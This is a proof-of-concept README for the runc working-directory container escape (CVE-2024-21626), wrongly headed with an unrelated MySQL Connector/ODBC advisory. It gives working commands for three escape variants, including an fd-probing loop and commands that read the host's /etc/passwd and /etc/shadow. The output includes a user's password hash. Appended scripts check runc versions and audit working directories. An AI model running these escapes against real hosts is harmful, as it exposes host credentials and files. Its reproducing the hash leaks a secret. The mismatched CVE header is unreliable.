
CVE-2024-21262 PoC — Oracle MySQL Security Vulnerability

Associated Vulnerability
Title: Oracle MySQL Security Vulnerability (CVE-2024-21262)
Description: Vulnerability in the MySQL Connectors product of Oracle MySQL (component: Connector/ODBC). Supported versions that are affected are 9.0.0 and prior. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Connectors. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of MySQL Connectors accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of MySQL Connectors. CVSS 3.1 Base Score 6.5 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L).
Description
Three different reproductions of the runc working-directory escape, which the linked resources track as CVE-2024-21626: WORKDIR, EXEC and RUNC (direct runc).
Readme
# RECORDS
Only for reproduction of CVEs.

Related Resources:

- [LINK](https://nitroc.org/en/posts/cve-2024-21626-illustrated/?utm_source=chatgpt.com#exploit-via-docker-exec)
- [GITHUB_1](https://github.com/V0WKeep3r/CVE-2024-21626-runcPOC#)
- [GITHUB_2](https://github.com/cdxiaodong/CVE-2024-21626)
- [ISSUE](https://github.com/NitroCao/CVE-2024-21626/issues/1)
----
## Check Envs
Download docker-24.0.6.tgz from https://download.docker.com/linux/static/stable/x86_64/.
```shell
sudo mkdir -p /usr/local/docker-24.0.6

sudo tar -xzf docker-24.0.6.tgz -C /usr/local/docker-24.0.6

sudo ln -sf /usr/local/docker-24.0.6/docker/* /usr/local/bin/

sudo ln -sf /usr/local/docker-24.0.6/docker/docker /usr/local/bin/docker

runc --version
docker --version
containerd --version
```
Expected result: Docker X<=24.0.6 bundled with runc Y<=1.1.9, so the version commands print something like:
```shell
runc version 1.1.9
commit: v1.1.9-0-gccaecfc
spec: 1.0.2-dev
go: go1.20.7
libseccomp: 2.5.1

Docker version 24.0.6, build ed223bc

containerd github.com/containerd/containerd v1.7.3 7880925980b188f4c97b462f709d0db8e8962aff
```

My Environment:
- Ubuntu 20.04
- Docker 24.0.6
- runc 1.1.9
- containerd 1.7.3
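As an added check (not part of the original PoC), the script below classifies a runc version string against the affected range instead of reading version strings by eye. It relies on one fact not stated above: the fix for CVE-2024-21626 shipped in runc 1.1.12, so every earlier 1.x release, including the 1.1.9 used here, is affected. The function names, `FIXED_RUNC`, and the numeric encoding of versions are the example's own.

```shell
#!/bin/sh
# Added check (not part of the original PoC): classify a runc version against
# the range affected by CVE-2024-21626. The fix shipped in runc 1.1.12, so
# anything older in the 1.x line (including the 1.1.9 above) is affected.
# Assumes the plain dotted version that `runc --version` prints, e.g. "1.1.9".

FIXED_RUNC="1.1.12"

# to_number VERSION -> integer that orders dotted versions, e.g. 1.1.9 -> 1001001009
# (leading "1" avoids leading zeros; each component is padded to three digits;
# missing components count as 0; suffixes such as "-rc1" or "+dev" are dropped)
to_number() {
    base="$(printf '%s' "$1" | sed 's/[^0-9.].*//').."
    major=$(printf '%s' "$base" | cut -d. -f1)
    minor=$(printf '%s' "$base" | cut -d. -f2)
    patch=$(printf '%s' "$base" | cut -d. -f3)
    printf '1%03d%03d%03d' "${major:-0}" "${minor:-0}" "${patch:-0}"
}

# runc_state VERSION -> prints "vulnerable" or "fixed"
runc_state() {
    v=$(to_number "$1")
    f=$(to_number "$FIXED_RUNC")
    # a release candidate of the fixed version (1.1.12-rc1) still predates the fix
    case "$1" in
        *-rc*) if [ "$v" -le "$f" ]; then v=$((v - 1)); fi ;;
    esac
    if [ "$v" -lt "$f" ]; then
        echo vulnerable
    else
        echo fixed
    fi
}

# installed_runc_version -> version of the runc on PATH (empty when none)
installed_runc_version() {
    command -v runc >/dev/null 2>&1 || return 0
    runc --version 2>/dev/null | sed -n 's/^runc version //p'
}

# report -> one summary line; this is what the script prints when run directly
report() {
    v=$(installed_runc_version)
    if [ -z "$v" ]; then
        echo "runc not found on PATH"
    else
        echo "runc $v: $(runc_state "$v")"
    fi
}

report
```

Run it on the host after the install steps above; on the lab machine described here it reports `runc 1.1.9: vulnerable`. Docker bundles its own runc, so check the binary the daemon actually uses (`docker version` lists it under the server's runc component), not only whatever `runc` is first on `PATH`.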


## SET daemon.json
```shell
sudo gedit /etc/docker/daemon.json
```
Add the following (the registry mirrors used by the author):
```json
{
  "registry-mirrors": [
    "https://docker.imgdb.de",
    "https://docker.xuanyuan.me",
    "https://doublezonline.cloud",
    "https://docker.wanpeng.top"
  ]
}
```
If Docker was installed as a system package (systemd unit):
```shell
systemctl daemon-reload
systemctl restart docker
```
If you used the static tgz (no unit file; dockerd has to be restarted by hand after every change):
```shell
sudo pkill dockerd 2>/dev/null || true
sudo dockerd &
```
In a new terminal, confirm the daemon works:
```shell
docker version
docker run hello-world
```

## ADD USER
```shell
sudo usermod -aG docker $USER
newgrp docker
id
```


## WORKDIR
The usable file-descriptor number under `/proc/1/fd/` differs between environments; this loop (the author's "bomb") simply tries each one:
```shell
#!/bin/bash
# try fds 3..10 as the working directory and see which one resolves
for i in {3..10} ; do
    docker run -w /proc/1/fd/$i ubuntu cat ../../../../../etc/passwd
done
```

```shell
docker run -w /proc/1/fd/9 ubuntu:latest cat ../../../../../etc/passwd
# if it fails, use:
# docker run -w /proc/self/fd/9 ubuntu:latest cat ../../../../../etc/shadow
# docker run -w /proc/self/fd/9 ubuntu:latest cat ../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:115::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:109:116:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:110:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
rtkit:x:111:117:RealtimeKit,,,:/proc:/usr/sbin/nologin
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
cups-pk-helper:x:113:120:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false
avahi:x:115:121:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
saned:x:117:123::/var/lib/saned:/usr/sbin/nologin
nm-openvpn:x:118:124:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin
hplip:x:119:7:HPLIP system user,,,:/run/hplip:/bin/false
whoopsie:x:120:125::/nonexistent:/bin/false
colord:x:121:126:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
fwupd-refresh:x:122:127:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
geoclue:x:123:128::/var/lib/geoclue:/usr/sbin/nologin
pulse:x:124:129:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
gnome-initial-setup:x:125:65534::/run/gnome-initial-setup/:/bin/false
gdm:x:126:131:Gnome Display Manager:/var/lib/gdm3:/bin/false
sssd:x:127:132:SSSD system user,,,:/var/lib/sss:/usr/sbin/nologin
puppy:x:1000:1000:puppy,,,:/home/puppy:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
```

## EXEC
Open a shell in a container, create a symlink to one of the process's own fds, then `docker exec -w` into that symlink from a second terminal:
```shell
# terminal 1: start the container
docker run --name test_book --rm -it debian:bookworm
# failed in my environment:
# ln -sf /proc/self/fd/8 /bar
# worked:
ln -sf /proc/self/fd/7 /test

# terminal 2: exec into the container with the symlink as working directory
docker exec -it -w /bar test_book sleep 1200
# fds 3, 6, 9 -> unknown
# fds 1, 2, 4, 5, 8 -> do not exist
# fd 7 -> succeeds with no output

# back in terminal 1: find the PID of the exec'd sleep
ls -F /proc
# the newest (highest-numbered) PID is the one to try first

cat /proc/id/cmdline
# replace id with each candidate PID until the output is sleep1200
# here it was: cat /proc/184/cmdline
ls -al /proc/id/cwd/../../../../home

ls -al /proc/184/cwd/../../../../home
# success: this is the host's /home
total 12
drwxr-xr-x  3 root root 4096 Mar 25  2025 .
drwxr-xr-x 20 root root 4096 Mar 25  2025 ..
drwxr-xr-x 20 1000 1000 4096 Oct  8 08:56 puppy

# list the host user's home directory
ls -al /proc/184/cwd/../../../../home/puppy
# success
total 108
drwxr-xr-x 20 1000 1000  4096 Oct  8 08:56 .
drwxr-xr-x  3 root root  4096 Mar 25  2025 ..
-rw-------  1 1000 1000 10382 Oct 10 06:49 .bash_history
-rw-r--r--  1 1000 1000   220 Mar 25  2025 .bash_logout
-rw-r--r--  1 1000 1000  3771 Mar 25  2025 .bashrc
drwx------ 16 1000 1000  4096 Oct  8 11:05 .cache
drwx------ 14 1000 1000  4096 Oct  7 13:40 .config
drwx------  3 1000 1000  4096 Mar 25  2025 .gnupg
drwx------  5 1000 1000  4096 Oct  8 11:14 .local
drwx------  4 1000 1000  4096 Mar 27  2025 .mozilla
-rw-r--r--  1 1000 1000   367 Mar 27  2025 .pam_environment
drwx------  3 1000 1000  4096 Oct  7 13:40 .pki
-rw-r--r--  1 1000 1000   807 Mar 25  2025 .profile
drwx------  2 1000 1000  4096 Oct  8 08:56 .ssh
-rw-r--r--  1 1000 1000     0 Mar 27  2025 .sudo_as_admin_successful
drwxrwxr-x  4 1000 1000  4096 Oct  7 13:40 .vscode
drwxrwxr-x  8 1000 1000  4096 Oct  8 14:30 Assignments
drwxr-xr-x  2 1000 1000  4096 Mar 25  2025 Desktop
drwxr-xr-x  2 1000 1000  4096 Mar 25  2025 Documents
drwxr-xr-x  2 1000 1000  4096 Mar 27  2025 Downloads
drwxr-xr-x  2 1000 1000  4096 Mar 25  2025 Music
drwxr-xr-x  2 1000 1000  4096 Mar 25  2025 Pictures
drwxr-xr-x  2 1000 1000  4096 Mar 25  2025 Public
drwxr-xr-x  2 1000 1000  4096 Mar 25  2025 Templates
drwxr-xr-x  2 1000 1000  4096 Mar 25  2025 Videos
drwx------  3 1000 1000  4096 Mar 27  2025 snap

cat /proc/id/cwd/../../../../etc/hostname

cat /proc/184/cwd/../../../../etc/hostname
# puppy-virtual-machine   (the host's hostname)
cat /etc/hostname
# prints the container's own hostname instead
```

-------------------

## RUNC directly
- check runc version:
```shell
runc --version
runc version 1.1.9
commit: v1.1.9-0-gccaecfc
spec: 1.0.2-dev
go: go1.20.7
libseccomp: 2.5.1
```
- Steps:
```shell
docker run --name helper-ctr alpine

# export the container's root filesystem and unpack it as the bundle rootfs
docker export helper-ctr --output alpine.tar
mkdir rootfs
tar xf alpine.tar -C rootfs
runc spec

# generate config.json, then point "cwd" at a /proc fd entry
# usually fd 7; otherwise find the number with the loop from the WORKDIR section
sed -ri 's#(\s*"cwd":)"(/)"#\1 "/proc/self/fd/7"#g' config.json

gedit config.json
# set "cwd": "/proc/self/fd/8"; fd 7 did not work in my environment
grep cwd config.json

# run with --log so failures are recorded
sudo runc --log ./log.json run demo
# this failure means the cwd fd number is wrong:
runc run failed: unable to start container process: error during container init: mkdir /proc/self/fd/7: no such file or directory
# on success you get a shell as root inside the container:
whoami
root

# read the host's shadow and passwd through the escaped working directory
cat ./../../../../../etc/shadow
cat ./../../../../../etc/passwd
# shadow info
root:!:20172:0:99999:7:::
daemon:*:19432:0:99999:7:::
bin:*:19432:0:99999:7:::
sys:*:19432:0:99999:7:::
sync:*:19432:0:99999:7:::
games:*:19432:0:99999:7:::
man:*:19432:0:99999:7:::
lp:*:19432:0:99999:7:::
mail:*:19432:0:99999:7:::
news:*:19432:0:99999:7:::
uucp:*:19432:0:99999:7:::
proxy:*:19432:0:99999:7:::
www-data:*:19432:0:99999:7:::
backup:*:19432:0:99999:7:::
list:*:19432:0:99999:7:::
irc:*:19432:0:99999:7:::
gnats:*:19432:0:99999:7:::
nobody:*:19432:0:99999:7:::
systemd-network:*:19432:0:99999:7:::
systemd-resolve:*:19432:0:99999:7:::
systemd-timesync:*:19432:0:99999:7:::
messagebus:*:19432:0:99999:7:::
syslog:*:19432:0:99999:7:::
_apt:*:19432:0:99999:7:::
tss:*:19432:0:99999:7:::
uuidd:*:19432:0:99999:7:::
tcpdump:*:19432:0:99999:7:::
avahi-autoipd:*:19432:0:99999:7:::
usbmux:*:19432:0:99999:7:::
rtkit:*:19432:0:99999:7:::
dnsmasq:*:19432:0:99999:7:::
cups-pk-helper:*:19432:0:99999:7:::
speech-dispatcher:!:19432:0:99999:7:::
avahi:*:19432:0:99999:7:::
kernoops:*:19432:0:99999:7:::
saned:*:19432:0:99999:7:::
nm-openvpn:*:19432:0:99999:7:::
hplip:*:19432:0:99999:7:::
whoopsie:*:19432:0:99999:7:::
colord:*:19432:0:99999:7:::
fwupd-refresh:*:19432:0:99999:7:::
geoclue:*:19432:0:99999:7:::
pulse:*:19432:0:99999:7:::
gnome-initial-setup:*:19432:0:99999:7:::
gdm:*:19432:0:99999:7:::
sssd:*:19432:0:99999:7:::
puppy:$6$n.X.gr9p8dot4UMU$SZvp7KLsk3E/M4Nedom.7R27UzvXi5gqA7Z6z51GFyIl2yehiytV23REPy22XoiF7jBvRdv.uWqs1vnvvGEy30:20172:0:99999:7:::
systemd-coredump:!!:20172::::::
```

**Pay attention to file descriptors: the fd number that works for `cwd` differs between environments, so you may need to run the probing ("bomb") script first.**
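The three reproductions (WORKDIR, EXEC and the edited `cwd` in config.json) share one signature: a working directory that points into `/proc/<pid>/fd/`. The script below is an added audit example, not part of the original PoC; it scans OCI bundle `config.json` files and the configured `WorkingDir` of running containers for that pattern. The function names and the `PATTERN` variable are the example's own, and the sample bundle used to exercise it is constructed.

```shell
#!/bin/sh
# Added audit example (not part of the original PoC): flag working directories
# that reach into /proc/<pid>/fd/, the pattern behind the WORKDIR, EXEC and
# RUNC reproductions. All names below are the example's own.

# extended regex for a /proc fd entry: /proc/self/fd/7, /proc/1/fd/9, ...
PATTERN='/proc/(self|[0-9]+)/fd/[0-9]+'

# suspicious_workdir PATH -> true if PATH is a /proc fd entry or lies under one
# (covers "-w /proc/1/fd/9" as well as "-w /proc/self/fd/7/../..")
suspicious_workdir() {
    printf '%s\n' "$1" | grep -Eq "^$PATTERN(/|\$)"
}

# scan_json FILE -> one line per "cwd"/"WorkingDir" value inside FILE that
# points into /proc fds; works for OCI config.json and `docker inspect` output
scan_json() {
    grep -Eo "\"(cwd|WorkingDir)\"[[:space:]]*:[[:space:]]*\"$PATTERN[^\"]*\"" "$1" |
    while read -r hit; do
        printf '%s: %s\n' "$1" "$hit"
    done
}

# scan_bundles DIR -> run scan_json on every config.json below DIR
scan_bundles() {
    find "$1" -type f -name config.json 2>/dev/null |
    while read -r f; do
        scan_json "$f"
    done
}

# scan_running -> check the configured WorkingDir of each running container;
# silently does nothing when docker is not installed
scan_running() {
    command -v docker >/dev/null 2>&1 || return 0
    docker ps -q | while read -r id; do
        wd=$(docker inspect -f '{{.Config.WorkingDir}}' "$id")
        if suspicious_workdir "$wd"; then
            printf 'container %s: WorkingDir=%s\n' "$id" "$wd"
        fi
    done
}

# usage: sh audit_workdir.sh /run/containerd   (any directory holding OCI bundles)
if [ -n "$1" ]; then
    scan_bundles "$1"
    scan_running
fi
```

Two caveats when using it: the working directory of a `docker exec -w` session is not recorded in `docker inspect` of the container, so the EXEC variant only shows up in the exec's own process spec or in the process's `/proc/<pid>/cwd`; and a pattern check is a compensating control, not a fix. Upgrading runc removes the bug itself.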